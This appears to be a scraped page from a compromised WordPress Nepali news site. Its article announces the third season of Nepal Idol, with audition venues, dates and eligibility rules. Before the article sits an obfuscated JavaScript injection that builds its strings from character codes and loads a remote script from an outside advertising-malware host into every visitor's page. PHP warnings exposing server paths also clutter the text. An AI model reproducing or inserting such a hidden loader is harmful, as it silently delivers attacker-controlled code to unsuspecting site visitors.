Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/includes/hooks.php on line 259
Warning: Cannot modify header information - headers already sent by (output started at /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/jetpack/sal/class.json-api-date.php:1) in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/post-views-counter/includes/counter.php on line 294
नेपाल आइडल को तेस्रो सिजन सुरु हुँदै, के के परिवर्तन भए त? – Nepali News Portal – Trending Nepali News
नेपाल आइडलको तेस्रो संस्करण पनि अब सुरु हुने भएको छ। पहिलो र दोस्रो संस्करण सम्पन्नका साथ् समापन गरि दुई आइडल प्राप्त गरिसकेको नेपाल आइडले फेरी तेस्रो संस्करण सुरु गर्न लागेको हो । नेपाल आइडलको पहिलो संस्करणको बिजेता बुद्ध लामा थिए भने दोस्रो रवि ओड, र अब हुनेछ तेस्रो आइडलको खोजी।
प्रत्येक वर्ष सुरु हुने उक्त कार्यक्रम फरक फरक नारा लिँदै आइरहेको छ र त्यस्तै यो वर्ष भने “संगीतको शिखर” नारा बोकेको यस कार्यक्रमले आफ्नो अफिसियल फेसबुक पेजमा अडिसन स्थान र मिति सार्वजनिक गरेको छ। पोखरा देखि सुरु हुने अडिसन काठमाडौँमा गएर सकिनेछ भने जम्मा ६ वटा ठाउँमा मात्र हुनेछ यो वर्षको अडिसन राउण्ड। पोखराबाट सुरु हुने उक्त अडिसन
१. पोखरा अडिसन – श्री जनप्रिय मा. वि. , सिमलचौर, पोखरा भाद्र ३१, २०७६ मङ्गलबार २. बुटवल अडिसन – लुम्बिनी बोर्डिङ्ग स्कुल – गोलपार्क, बुटवल – आश्विन ०३, २०७६ शुक्रबार ३. नेपालगंज अडिसन – ब्राइटल्याण्ड कलेज – पासांग ल्हामु रोड – १०, बाँके – आश्विन ०६, २०७६ सोमबार ४. बिरगंज अडिसन – बिरगंज इन्स्टिच्युट अफ टेक्नोलोजी – पिपरा-१७, बिरगंज – आश्विन १०, २०७६ शुक्रवार ५. बिर्तामोड अडिसन – देवी सेकेण्डरी स्कुल – विर्तामोड-५, कन्काई रोड – आश्विन १४, २०७६ मंगलवार ६. काठमाडौँ अडिसन – ई. पि. एस. स्कुल – मिन भवन काठमाडौँ – कार्तिक ०२, २०७६ शनिवार यी ६ स्थानमा अडिसन हुनेछ भने रजिस्ट्रेसन फम तोकिएका स्थान वा अडिसन स्थल मै प्राप्त गर्न सकिनेछ। उक्त अडिसनमा मात्र १६ वर्ष देखि ३० वर्षसम्म उमेर भएका व्यक्तिले मात्र समावेश हुन पाउनेछन। आवश्यक कागजात: २ प्रति पासपोर्ट साइज फोटो, नागरिकता वा उमेर खुल्ने प्रमाणपत्र र समय: बिहान ८ बजे देखि अपरान्ह ४ बजेसम्म। कार्यक्रम एपि वान टिभी बाटै प्रसारण हुनेछ तर तिहार पछि मात्र। मिति भने तोकिएको छैन। प्रोजेक्ट हेड सुरेश पौड्यालसँगको कुराकानी अनुसार यो वर्ष जज र कार्यक्रम प्रस्तोतामा कुनै फेर बादल हुने छैन। संगीतको शिखर, नेपाल आइडल – सिजन ३
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13